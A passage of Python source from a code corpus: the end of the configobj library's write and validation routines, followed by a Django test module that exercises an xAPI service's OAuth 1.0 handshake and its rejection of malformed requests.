line = self._decode_element(line)
stripped_line = line.strip()
if stripped_line and not stripped_line.startswith(cs):
line = csp + line
out.append(line)
self.interpolation = int_val
if section is not self:
return out
if (self.filename is None) and (outfile is None):
# output a list of lines
# might need to encode
# NOTE: This will *screw* UTF16, each line will start with the BOM
if self.encoding:
out = [l.encode(self.encoding) for l in out]
if (self.BOM and ((self.encoding is None) or
(BOM_LIST.get(self.encoding.lower()) == 'utf_8'))):
# Add the UTF8 BOM
if not out:
out.append('')
out[0] = BOM_UTF8 + out[0]
return out
# Turn the list to a string, joined with correct newlines
newline = self.newlines or os.linesep
if (getattr(outfile, 'mode', None) is not None and outfile.mode == 'w'
and sys.platform == 'win32' and newline == '\r\n'):
# Windows specific hack to avoid writing '\r\r\n'
newline = '\n'
output = self._a_to_u(newline).join(out)
if not output.endswith(newline):
output += newline
if isinstance(output, six.binary_type):
output_bytes = output
else:
output_bytes = output.encode(self.encoding or
self.default_encoding or
'ascii')
if self.BOM and ((self.encoding is None) or match_utf8(self.encoding)):
# Add the UTF8 BOM
output_bytes = BOM_UTF8 + output_bytes
if outfile is not None:
outfile.write(output_bytes)
else:
with open(self.filename, 'wb') as h:
h.write(output_bytes)
def validate(self, validator, preserve_errors=False, copy=False,
section=None):
"""
Test the ConfigObj against a configspec.
It uses the ``validator`` object from *validate.py*.
To run ``validate`` on the current ConfigObj, call: ::
test = config.validate(validator)
(Normally having previously passed in the configspec when the ConfigObj
was created - you can dynamically assign a dictionary of checks to the
``configspec`` attribute of a section though).
It returns ``True`` if everything passes, or a dictionary of
pass/fails (True/False). If every member of a subsection passes, it
will just have the value ``True``. (It also returns ``False`` if all
members fail).
In addition, it converts the values from strings to their native
types if their checks pass (and ``stringify`` is set).
If ``preserve_errors`` is ``True`` (``False`` is default) then instead
of a marking a fail with a ``False``, it will preserve the actual
exception object. This can contain info about the reason for failure.
For example the ``VdtValueTooSmallError`` indicates that the value
supplied was too small. If a value (or section) is missing it will
still be marked as ``False``.
You must have the validate module to use ``preserve_errors=True``.
You can then use the ``flatten_errors`` function to turn your nested
results dictionary into a flattened list of failures - useful for
displaying meaningful error messages.
"""
if section is None:
if self.configspec is None:
raise ValueError('No configspec supplied.')
if preserve_errors:
# We do this once to remove a top level dependency on the validate module
# Which makes importing configobj faster
from validate import VdtMissingValue
self._vdtMissingValue = VdtMissingValue
section = self
if copy:
section.initial_comment = section.configspec.initial_comment
section.final_comment = section.configspec.final_comment
section.encoding = section.configspec.encoding
section.BOM = section.configspec.BOM
section.newlines = section.configspec.newlines
section.indent_type = section.configspec.indent_type
#
# section.default_values.clear() #??
configspec = section.configspec
self._set_configspec(section, copy)
def validate_entry(entry, spec, val, missing, ret_true, ret_false):
section.default_values.pop(entry, None)
try:
section.default_values[entry] = validator.get_default_value(configspec[entry])
except (KeyError, AttributeError, validator.baseErrorClass):
# No default, bad default or validator has no 'get_default_value'
# (e.g. SimpleVal)
pass
try:
check = validator.check(spec,
val,
missing=missing
)
except validator.baseErrorClass as e:
if not preserve_errors or isinstance(e, self._vdtMissingValue):
out[entry] = False
else:
# preserve the error
out[entry] = e
ret_false = False
ret_true = False
else:
ret_false = False
out[entry] = True
if self.stringify or missing:
# if we are doing type conversion
# or the value is a supplied default
if not self.stringify:
if isinstance(check, (list, tuple)):
# preserve lists
check = [self._str(item) for item in check]
elif missing and check is None:
# convert the None from a default to a ''
check = ''
else:
check = self._str(check)
if (check != val) or missing:
section[entry] = check
if not copy and missing and entry not in section.defaults:
section.defaults.append(entry)
return ret_true, ret_false
#
out = {}
ret_true = True
ret_false = True
unvalidated = [k for k in section.scalars if k not in configspec]
incorrect_sections = [k for k in configspec.sections if k in section.scalars]
incorrect_scalars = [k for k in configspec.scalars if k in section.sections]
for entry in configspec.scalars:
if entry in ('__many__', '___many___'):
# reserved names
continue
if (not entry in section.scalars) or (entry in section.defaults):
# missing entries
# or entries from defaults
missing = True
val = None
if copy and entry not in section.scalars:
# copy comments
section.comments[entry] = (
configspec.comments.get(entry, []))
section.inline_comments[entry] = (
configspec.inline_comments.get(entry, ''))
#
else:
missing = False
val = section[entry]
ret_true, ret_false = validate_entry(entry, configspec[entry], val,
missing, ret_true, ret_false)
many = None
if '__many__' in configspec.scalars:
many = configspec['__many__']
elif '___many___' in configspec.scalars:
many = configspec['___many___']
if many is not None:
for entry in unvalidated:
val = section[entry]
ret_true, ret_false = validate_entry(entry, many, val, False,
ret_true, ret_false)
unvalidated = []
for entry in incorrect_scalars:
ret_true = False
if not preserve_errors:
out[entry] = False
else:
ret_false = False
msg = 'Value %r was provided as a section' % entry
out[entry] = validator.baseErrorClass(msg)
for entry in incorrect_sections:
ret_true = False
if not preserve_errors:
out[entry] = False
else:
ret_false = False
msg = 'Section %r was provided as a single value' % entry
out[entry] = validator.baseErrorClass(msg)
# Missing sections will have been created as empty ones when the
# configspec was read.
for entry in section.sections:
# FIXME: this means DEFAULT is not copied in copy mode
if section is self and entry == 'DEFAULT':
continue
if section[entry].configspec is None:
unvalidated.append(entry)
continue
if copy:
section.comments[entry] = configspec.comments.get(entry, [])
section.inline_comments[entry] = configspec.inline_comments.get(entry, '')
check = self.validate(validator, preserve_errors=preserve_errors, copy=copy, section=section[entry])
out[entry] = check
if check == False:
ret_true = False
elif check == True:
ret_false = False
else:
ret_true = False
section.extra_values = unvalidated
if preserve_errors and not section._created:
# If the section wasn't created (i.e. it wasn't missing)
# then we can't return False, we need to preserve errors
ret_false = False
#
if ret_false and preserve_errors and out:
# If we are preserving errors, but all
# the failures are from missing sections / values
# then we can return False. Otherwise there is a
# real failure that we need to preserve.
ret_false = not any(out.values())
if ret_true:
return True
elif ret_false:
return False
return out
def reset(self):
"""Clear ConfigObj instance and restore to 'freshly created' state."""
self.clear()
self._initialise()
# FIXME: Should be done by '_initialise', but ConfigObj constructor (and reload)
# requires an empty dictionary
self.configspec = None
# Just to be sure ;-)
self._original_configspec = None
def reload(self):
"""
Reload a ConfigObj from file.
This method raises a ``ReloadError`` if the ConfigObj doesn't have
a filename attribute pointing to a file.
"""
if not isinstance(self.filename, six.string_types):
raise ReloadError()
filename = self.filename
current_options = {}
for entry in OPTION_DEFAULTS:
if entry == 'configspec':
continue
current_options[entry] = getattr(self, entry)
configspec = self._original_configspec
current_options['configspec'] = configspec
self.clear()
self._initialise(current_options)
self._load(filename, configspec)
class SimpleVal(object):
"""
A simple validator.
Can be used to check that all members expected are present.
To use it, provide a configspec with all your members in (the value given
will be ignored). Pass an instance of ``SimpleVal`` to the ``validate``
method of your ``ConfigObj``. ``validate`` will return ``True`` if all
members are present, or a dictionary with True/False meaning
present/missing. (Whole missing sections will be replaced with ``False``)
"""
def __init__(self):
self.baseErrorClass = ConfigObjError
def check(self, check, member, missing=False):
"""A dummy check method, always returns the value unchanged."""
if missing:
raise self.baseErrorClass()
return member
def flatten_errors(cfg, res, levels=None, results=None):
"""
An example function that will turn a nested dictionary of results
(as returned by ``ConfigObj.validate``) into a flat list.
``cfg`` is the ConfigObj instance being checked, ``res`` is the results
dictionary returned by ``validate``.
(This is a recursive function, so you shouldn't use the ``levels`` or
``results`` arguments - they are used by the function.)
Returns a list of keys that failed. Each member of the list is a tuple::
([list of sections...], key, result)
If ``validate`` was called with ``preserve_errors=False`` (the default)
then ``result`` will always be ``False``.
*list of sections* is a flattened list of sections that the key was found
in.
If the section was missing (or a section was expected and a scalar provided
- or vice-versa) then key will be ``None``.
If the value (or section) was missing then ``result`` will be ``False``.
If ``validate`` was called with ``preserve_errors=True`` and a value
was present, but failed the check, then ``result`` will be the exception
object returned. You can use this as a string that describes the failure.
For example *The value "3" is of the wrong type*.
"""
if levels is None:
# first time called
levels = []
results = []
if res == True:
return sorted(results)
if res == False or isinstance(res, Exception):
results.append((levels[:], None, res))
if levels:
levels.pop()
return sorted(results)
for (key, val) in list(res.items()):
if val == True:
continue
if isinstance(cfg.get(key), dict):
# Go down one level
levels.append(key)
flatten_errors(cfg[key], val, levels, results)
continue
results.append((levels[:], key, val))
#
# Go up one level
if levels:
levels.pop()
#
return sorted(results)
def get_extra_values(conf, _prepend=()):
"""
Find all the values and sections not in the configspec from a validated
ConfigObj.
``get_extra_values`` returns a list of tuples where each tuple represents
either an extra section, or an extra value.
The tuples contain two values, a tuple representing the section the value
is in and the name of the extra values. For extra values in the top level
section the first member will be an empty tuple. For values in the 'foo'
section the first member will be ``('foo',)``. For members in the 'bar'
subsection of the 'foo' section the first member will be ``('foo', 'bar')``.
NOTE: If you call ``get_extra_values`` on a ConfigObj instance that hasn't
been validated it will return an empty list.
"""
out = []
out.extend([(_prepend, name) for name in conf.extra_values])
for name in conf.sections:
if name not in conf.extra_values:
out.extend(get_extra_values(conf[name], _prepend + (name,)))
return out
"""*A programming language is a medium of expression.* - Paul Graham"""
| theguardian/JIRA-APPy | lib/configobj/configobj.py | Python | gpl-2.0 | 89,640 | 0.003614 |
import uuid
import json
import urllib
import os
import base64
import time
import string
import random
import oauth2 as oauth
from Crypto.PublicKey import RSA
from django.conf import settings
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from django.test import TestCase
from ..views import reg_client, register, statements
from ..models import Activity, Agent
from oauth_provider.models import Consumer, Token, Nonce
from oauth_provider.utils import SignatureMethod_RSA_SHA1
# Django client uses testserver
TEST_SERVER = 'http://testserver'
INITIATE_ENDPOINT = TEST_SERVER + "/XAPI/OAuth/initiate"
AUTHORIZATION_ENDPOINT = TEST_SERVER + "/XAPI/OAuth/authorize"
TOKEN_ENDPOINT = TEST_SERVER + "/XAPI/OAuth/token"
class OAuthTests(TestCase):
@classmethod
def setUpClass(cls):
print "\n%s" % __name__
def setUp(self):
if not settings.OAUTH_ENABLED:
settings.OAUTH_ENABLED = True
# Create a user
self.user = User.objects.create_user('jane', '[email protected]', 'toto')
self.client.login(username='jane', password='toto')
#Register a consumer
self.name = "test jane client"
self.desc = "test jane client desc"
form = {"name":self.name, "description":self.desc}
self.client.post(reverse(reg_client),form)
self.consumer = Consumer.objects.get(name=self.name)
self.name2jane = "test jane client2"
self.desc2jane = "test jane client desc2"
form2jane = {"name":self.name2jane, "description":self.desc2jane}
self.client.post(reverse(reg_client),form2jane)
self.consumer2jane = Consumer.objects.get(name=self.name2jane)
self.client.logout()
self.jane_auth = "Basic %s" % base64.b64encode("%s:%s" % ('jane','toto'))
# Create a user
self.user2 = User.objects.create_user('dick', '[email protected]', 'lassie')
self.client.login(username='dick', password='lassie')
#Register a client
self.name2 = "test client2"
self.desc2 = "test desc2"
form2 = {"name":self.name2, "description":self.desc2}
self.client.post(reverse(reg_client),form2)
self.consumer2 = Consumer.objects.get(name=self.name2)
self.client.logout()
self.dick_auth = "Basic %s" % base64.b64encode("%s:%s" % ('dick','lassie'))
def tearDown(self):
if settings.OAUTH_ENABLED:
settings.OAUTH_ENABLED = False
# Delete everything
Token.objects.all().delete()
Consumer.objects.all().delete()
Nonce.objects.all().delete()
User.objects.all().delete()
attach_folder_path = os.path.join(settings.MEDIA_ROOT, "activity_state")
for the_file in os.listdir(attach_folder_path):
file_path = os.path.join(attach_folder_path, the_file)
try:
os.unlink(file_path)
except Exception, e:
raise e
def oauth_handshake(self, scope=True, scope_type=None, parameters=None, param_type='qs', change_scope=[],
request_nonce='', access_nonce='', resource_nonce='', consumer=None):
# ============= INITIATE =============
if not request_nonce:
request_nonce = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(6))
if not consumer:
consumer = self.consumer
oauth_header_request_token_params = "OAuth realm=\"test\","\
"oauth_consumer_key=\"%s\","\
"oauth_signature_method=\"HMAC-SHA1\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"%s\","\
"oauth_version=\"1.0\","\
"oauth_callback=\"http://example.com/access_token_ready\"" % (consumer.key,str(int(time.time())), request_nonce)
# Add non oauth parameters appropriately
request_token_params = {}
if parameters:
request_token_params = parameters
# Set scope
if scope:
if scope_type:
request_token_params['scope'] = scope_type
else:
request_token_params['scope'] = "all"
# Add non oauth params in query string or form
if param_type == 'qs':
request_token_path = "%s?%s" % (INITIATE_ENDPOINT, urllib.urlencode(request_token_params))
else:
request_token_path = INITIATE_ENDPOINT
# Make the params into a dict to pass into from_consumer_and_token
oauth_header_request_token_params_list = oauth_header_request_token_params.split(",")
oauth_header_request_token_params_dict = {}
for p in oauth_header_request_token_params_list:
item = p.split("=")
oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# get_oauth_request in views ignores realm, must remove so not input to from_token_and_callback
del oauth_header_request_token_params_dict['OAuth realm']
# Make oauth request depending on where the parameters are
if param_type == 'qs':
oauth_request = oauth.Request.from_consumer_and_token(consumer, token=None, http_method='GET',
http_url=request_token_path, parameters=oauth_header_request_token_params_dict)
else:
oauth_request = oauth.Request.from_consumer_and_token(consumer, token=None, http_method='POST',
http_url=request_token_path, parameters=dict(oauth_header_request_token_params_dict.items()+request_token_params.items()))
# create signature and add it to the header params
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, consumer, None)
oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature
# Send request depending on the parameters
if param_type == 'qs':
request_resp = self.client.get(request_token_path, Authorization=oauth_header_request_token_params)
else:
request_resp = self.client.post(request_token_path, Authorization=oauth_header_request_token_params, data=request_token_params,
content_type="application/x-www-form-urlencoded")
# Get request token (will be only token for that user)
self.assertEqual(request_resp.status_code, 200)
self.assertIn('oauth_token_secret', request_resp.content)
self.assertIn('oauth_token', request_resp.content)
self.assertIn('oauth_callback_confirmed', request_resp.content)
token_secret = request_resp.content.split('&')[0].split('=')[1]
request_token = Token.objects.get(secret=token_secret)
# ============= END INITIATE =============
# ============= AUTHORIZE =============
# Create authorize path, must have oauth_token param
authorize_param = {'oauth_token': request_token.key}
authorize_path = "%s?%s" % (AUTHORIZATION_ENDPOINT, urllib.urlencode(authorize_param))
# Try to hit auth path, made to login
auth_resp = self.client.get(authorize_path)
self.assertEqual(auth_resp.status_code, 302)
self.assertIn('http://testserver/accounts/login?next=/XAPI/OAuth/authorize%3F', auth_resp['Location'])
self.assertIn(request_token.key, auth_resp['Location'])
self.client.login(username='jane', password='toto')
self.assertEqual(request_token.is_approved, False)
# After being redirected to login and logging in again, try get again
auth_resp = self.client.get(authorize_path)
self.assertEqual(auth_resp.status_code, 200) # Show return/display OAuth authorized view
# Get the form, set required fields
auth_form = auth_resp.context['form']
data = auth_form.initial
data['authorize_access'] = 1
data['oauth_token'] = request_token.key
# Change scope if wanted
if change_scope:
data['scope'] = change_scope
# Post data back to auth endpoint - should redirect to callback_url we set in oauth headers with request token
auth_post = self.client.post(AUTHORIZATION_ENDPOINT, data)
self.assertEqual(auth_post.status_code, 302)
# Check if oauth_verifier and oauth_token are returned
self.assertIn('http://example.com/access_token_ready?oauth_verifier=', auth_post['Location'])
self.assertIn('oauth_token=', auth_post['Location'])
# Get token again just to make sure
token_key = auth_post['Location'].split('?')[1].split('&')[1].split('=')[1]
request_token_after_auth = Token.objects.get(key=token_key)
self.assertIn(request_token_after_auth.key, auth_post['Location'])
self.assertEqual(request_token_after_auth.is_approved, True)
# ============= END AUTHORIZE =============
# ============= ACCESS TOKEN =============
if not access_nonce:
access_nonce = "access_nonce"
# Set verifier in access_token params and create new oauth request
oauth_header_access_token_params = "OAuth realm=\"test\","\
"oauth_consumer_key=\"%s\","\
"oauth_token=\"%s\","\
"oauth_signature_method=\"HMAC-SHA1\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"%s\","\
"oauth_version=\"1.0\","\
"oauth_verifier=\"%s\"" % (consumer.key, request_token_after_auth.key, str(int(time.time())), access_nonce, request_token_after_auth.verifier)
# from_token_and_callback takes a dictionary
param_list = oauth_header_access_token_params.split(",")
oauth_header_access_params_dict = {}
for p in param_list:
item = p.split("=")
oauth_header_access_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# from_request ignores realm, must remove so not input to from_token_and_callback
del oauth_header_access_params_dict['OAuth realm']
oauth_request = oauth.Request.from_token_and_callback(request_token_after_auth, http_method='GET',
http_url=TOKEN_ENDPOINT, parameters=oauth_header_access_params_dict)
# Create signature and add it to the headers
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, consumer, request_token_after_auth)
oauth_header_access_token_params += ',oauth_signature="%s"' % signature
# Get access token
access_resp = self.client.get(TOKEN_ENDPOINT, Authorization=oauth_header_access_token_params)
self.assertEqual(access_resp.status_code, 200)
content = access_resp.content.split('&')
access_token_secret = content[0].split('=')[1]
access_token_key = content[1].split('=')[1]
access_token = Token.objects.get(secret=access_token_secret, key=access_token_key)
# ============= END ACCESS TOKEN =============
if not resource_nonce:
resource_nonce = "resource_nonce"
# Set oauth headers user will use when hitting xapi endpoing and access token
oauth_header_resource_params = "OAuth realm=\"test\", "\
"oauth_consumer_key=\"%s\","\
"oauth_token=\"%s\","\
"oauth_signature_method=\"HMAC-SHA1\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"%s\","\
"oauth_version=\"1.0\"" % (consumer.key, access_token.key, str(int(time.time())), resource_nonce)
self.client.logout()
return oauth_header_resource_params, access_token
def oauth_handshake2(self, scope=True, scope_type=None, parameters=None, param_type='qs', change_scope=[],
request_nonce='', access_nonce='', resource_nonce=''):
# ============= INITIATE =============
if not request_nonce:
request_nonce = "request_nonce2"
oauth_header_request_token_params = "OAuth realm=\"test\","\
"oauth_consumer_key=\"%s\","\
"oauth_signature_method=\"HMAC-SHA1\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"%s\","\
"oauth_version=\"1.0\","\
"oauth_callback=\"http://example.com/access_token_ready\"" % (self.consumer2.key,str(int(time.time())), request_nonce)
# Add non oauth parameters appropriately
request_token_params = {}
if parameters:
request_token_params = parameters
if scope:
if scope_type:
request_token_params['scope'] = scope_type
else:
request_token_params['scope'] = "all"
if param_type == 'qs':
request_token_path = "%s?%s" % (INITIATE_ENDPOINT, urllib.urlencode(request_token_params))
else:
request_token_path = INITIATE_ENDPOINT
# Make the params into a dict to pass into from_consumer_and_token
oauth_header_request_token_params_list = oauth_header_request_token_params.split(",")
oauth_header_request_token_params_dict = {}
for p in oauth_header_request_token_params_list:
item = p.split("=")
oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# get_oauth_request in views ignores realm, must remove so not input to from_token_and_callback
del oauth_header_request_token_params_dict['OAuth realm']
if param_type == 'qs':
oauth_request = oauth.Request.from_consumer_and_token(self.consumer2, token=None, http_method='GET',
http_url=request_token_path, parameters=oauth_header_request_token_params_dict)
else:
oauth_request = oauth.Request.from_consumer_and_token(self.consumer2, token=None, http_method='POST',
http_url=request_token_path, parameters=dict(oauth_header_request_token_params_dict.items()+request_token_params.items()))
# create signature and add it to the header params
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, self.consumer2, None)
oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature
if param_type == 'qs':
request_resp = self.client.get(request_token_path, Authorization=oauth_header_request_token_params)
else:
request_resp = self.client.post(request_token_path, Authorization=oauth_header_request_token_params, data=request_token_params,
content_type="application/x-www-form-urlencoded")
self.assertEqual(request_resp.status_code, 200)
self.assertIn('oauth_token_secret', request_resp.content)
self.assertIn('oauth_token', request_resp.content)
self.assertIn('oauth_callback_confirmed', request_resp.content)
request_token = Token.objects.get(consumer=self.consumer2)
# ============= END INITIATE =============
# ============= AUTHORIZE =============
authorize_param = {'oauth_token': request_token.key}
authorize_path = "%s?%s" % (AUTHORIZATION_ENDPOINT, urllib.urlencode(authorize_param))
auth_resp = self.client.get(authorize_path)
self.assertEqual(auth_resp.status_code, 302)
self.assertIn('http://testserver/accounts/login?next=/XAPI/OAuth/authorize%3F', auth_resp['Location'])
self.assertIn(request_token.key, auth_resp['Location'])
self.client.login(username='dick', password='lassie')
self.assertEqual(request_token.is_approved, False)
# After being redirected to login and logging in again, try get again
auth_resp = self.client.get(authorize_path)
self.assertEqual(auth_resp.status_code, 200) # Show return/display OAuth authorized view
auth_form = auth_resp.context['form']
data = auth_form.initial
data['authorize_access'] = 1
data['oauth_token'] = request_token.key
# Change scope if wanted
if change_scope:
data['scope'] = change_scope
auth_post = self.client.post(AUTHORIZATION_ENDPOINT, data)
self.assertEqual(auth_post.status_code, 302)
# Check if oauth_verifier and oauth_token are returned
self.assertIn('http://example.com/access_token_ready?oauth_verifier=', auth_post['Location'])
self.assertIn('oauth_token=', auth_post['Location'])
request_token_after_auth = Token.objects.get(consumer=self.consumer2)
self.assertIn(request_token_after_auth.key, auth_post['Location'])
self.assertEqual(request_token_after_auth.is_approved, True)
# ============= END AUTHORIZE =============
# ============= ACCESS TOKEN =============
if not access_nonce:
access_nonce = "access_nonce2"
oauth_header_access_token_params = "OAuth realm=\"test\","\
"oauth_consumer_key=\"%s\","\
"oauth_token=\"%s\","\
"oauth_signature_method=\"HMAC-SHA1\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"%s\","\
"oauth_version=\"1.0\","\
"oauth_verifier=\"%s\"" % (self.consumer2.key, request_token_after_auth.key, str(int(time.time())), access_nonce, request_token_after_auth.verifier)
# from_token_and_callback takes a dictionary
param_list = oauth_header_access_token_params.split(",")
oauth_header_access_params_dict = {}
for p in param_list:
item = p.split("=")
oauth_header_access_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# from_request ignores realm, must remove so not input to from_token_and_callback
del oauth_header_access_params_dict['OAuth realm']
oauth_request = oauth.Request.from_token_and_callback(request_token_after_auth, http_method='GET',
http_url=TOKEN_ENDPOINT, parameters=oauth_header_access_params_dict)
# Create signature and add it to the headers
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, self.consumer2, request_token_after_auth)
oauth_header_access_token_params += ',oauth_signature="%s"' % signature
access_resp = self.client.get(TOKEN_ENDPOINT, Authorization=oauth_header_access_token_params)
self.assertEqual(access_resp.status_code, 200)
content = access_resp.content.split('&')
access_token_secret = content[0].split('=')[1]
access_token_key = content[1].split('=')[1]
access_token = Token.objects.get(secret=access_token_secret, key=access_token_key)
# ============= END ACCESS TOKEN =============
if not resource_nonce:
resource_nonce = "resource_nonce2"
oauth_header_resource_params = "OAuth realm=\"test\", "\
"oauth_consumer_key=\"%s\","\
"oauth_token=\"%s\","\
"oauth_signature_method=\"HMAC-SHA1\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"%s\","\
"oauth_version=\"1.0\"" % (self.consumer2.key, access_token.key, str(int(time.time())), resource_nonce)
self.client.logout()
return oauth_header_resource_params, access_token
def test_request_token_missing_headers(self):
# Missing signature method
oauth_header_request_token_params = "OAuth realm=\"test\","\
"oauth_consumer_key=\"%s\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"requestnonce\","\
"oauth_version=\"1.0\","\
"oauth_callback=\"http://example.com/request_token_ready\"" % (self.consumer.key,str(int(time.time())))
# Make string params into dictionary for from_consumer_and_token function
request_token_param_list = oauth_header_request_token_params.split(",")
oauth_header_request_token_params_dict = {}
for p in request_token_param_list:
item = p.split("=")
oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# Create OAuth request and signature
oauth_request = oauth.Request.from_consumer_and_token(self.consumer, token=None, http_method='GET',
http_url=INITIATE_ENDPOINT, parameters=oauth_header_request_token_params_dict)
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, self.consumer, None)
# Append signature to string headers
oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature
resp = self.client.get(INITIATE_ENDPOINT)
self.assertEqual(resp.status_code, 400)
self.assertEqual(resp.content, 'Invalid request parameters.')
def test_request_token_unsupported_headers(self):
# Rogue oauth param added
oauth_header_request_token_params = "OAuth realm=\"test\","\
"oauth_consumer_key=\"%s\","\
"this_is_not_good=\"blah\","\
"oauth_signature_method=\"HMAC-SHA1\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"requestnonce\","\
"oauth_version=\"1.0\","\
"oauth_callback=\"http://example.com/request_token_ready\"" % (self.consumer.key,str(int(time.time())))
# Make string params into dictionary for from_consumer_and_token function
request_token_param_list = oauth_header_request_token_params.split(",")
oauth_header_request_token_params_dict = {}
for p in request_token_param_list:
item = p.split("=")
oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# Create oauth request and signature
oauth_request = oauth.Request.from_consumer_and_token(self.consumer, token=None, http_method='GET',
http_url=INITIATE_ENDPOINT, parameters=oauth_header_request_token_params_dict)
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, self.consumer, None)
# Append signature
oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature
resp = self.client.get(INITIATE_ENDPOINT)
self.assertEqual(resp.status_code, 400)
self.assertEqual(resp.content, 'Invalid request parameters.')
def test_request_token_duplicated_headers(self):
# Duplicate signature_method
oauth_header_request_token_params = "OAuth realm=\"test\","\
"oauth_consumer_key=\"%s\","\
"oauth_signature_method=\"HMAC-SHA1\","\
"oauth_signature_method=\"HMAC-SHA1\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"requestnonce\","\
"oauth_version=\"1.0\","\
"oauth_callback=\"http://example.com/request_token_ready\"" % (self.consumer.key,str(int(time.time())))
# Make string params into dictionary for from_consumer_and_token function
request_token_param_list = oauth_header_request_token_params.split(",")
oauth_header_request_token_params_dict = {}
for p in request_token_param_list:
item = p.split("=")
oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
oauth_request = oauth.Request.from_consumer_and_token(self.consumer, token=None, http_method='GET',
http_url=INITIATE_ENDPOINT, parameters=oauth_header_request_token_params_dict)
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, self.consumer, None)
# Append signature
oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature
resp = self.client.get(INITIATE_ENDPOINT)
self.assertEqual(resp.status_code, 400)
self.assertEqual(resp.content, 'Invalid request parameters.')
def test_request_token_unsupported_signature_method(self):
# Add unsupported signature method
oauth_header_request_token_params = "OAuth realm=\"test\","\
"oauth_consumer_key=\"%s\","\
"oauth_signature_method=\"unsupported\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"requestnonce\","\
"oauth_version=\"1.0\","\
"oauth_callback=\"http://example.com/request_token_ready\"" % (self.consumer.key,str(int(time.time())))
# Make string params into dictionary for from_consumer_and_token function
request_token_param_list = oauth_header_request_token_params.split(",")
oauth_header_request_token_params_dict = {}
for p in request_token_param_list:
item = p.split("=")
oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
oauth_request = oauth.Request.from_consumer_and_token(self.consumer, token=None, http_method='GET',
http_url=INITIATE_ENDPOINT, parameters=oauth_header_request_token_params_dict)
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, self.consumer, None)
# Append signature
oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature
resp = self.client.get(INITIATE_ENDPOINT)
self.assertEqual(resp.status_code, 400)
self.assertEqual(resp.content, 'Invalid request parameters.')
def test_request_token_invalid_consumer_credentials(self):
# Non existent consumer key
oauth_header_request_token_params = "OAuth realm=\"test\","\
"oauth_consumer_key=\"%s\","\
"oauth_signature_method=\"unsupported\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"requestnonce\","\
"oauth_version=\"1.0\","\
"oauth_callback=\"http://example.com/request_token_ready\"" % ("aaaaaaaaaaaaaa",str(int(time.time())))
# Make string params into dictionary for from_consumer_and_token function
request_token_param_list = oauth_header_request_token_params.split(",")
oauth_header_request_token_params_dict = {}
for p in request_token_param_list:
item = p.split("=")
oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
oauth_request = oauth.Request.from_consumer_and_token(self.consumer, token=None, http_method='GET',
http_url=INITIATE_ENDPOINT, parameters=oauth_header_request_token_params_dict)
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, self.consumer, None)
# Append signature
oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature
resp = self.client.get(INITIATE_ENDPOINT, Authorization=oauth_header_request_token_params)
self.assertEqual(resp.status_code, 401)
self.assertEqual(resp.content, 'Invalid consumer.')
def test_request_token_unknown_scope(self):
# passing scope as form param instead of in query string in this instance - scope DNE
form_data = {
'scope':'DNE',
}
oauth_header_request_token_params = "OAuth realm=\"test\","\
"oauth_consumer_key=\"%s\","\
"oauth_signature_method=\"HMAC-SHA1\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"requestnonce\","\
"oauth_version=\"1.0\","\
"oauth_callback=\"http://example.com/request_token_ready\"" % (self.consumer.key,str(int(time.time())))
# Make string params into dictionary for from_consumer_and_token function
request_token_param_list = oauth_header_request_token_params.split(",")
oauth_header_request_token_params_dict = {}
for p in request_token_param_list:
item = p.split("=")
oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
oauth_request = oauth.Request.from_consumer_and_token(self.consumer, token=None, http_method='GET',
http_url=INITIATE_ENDPOINT, parameters=dict(oauth_header_request_token_params_dict.items()+form_data.items()))
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, self.consumer, None)
# Add signature
oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature
request_resp = self.client.get(INITIATE_ENDPOINT, Authorization=oauth_header_request_token_params, data=form_data,
content_type="x-www-form-urlencoded")
self.assertEqual(request_resp.status_code, 400)
self.assertEqual(request_resp.content, 'Could not verify OAuth request.')
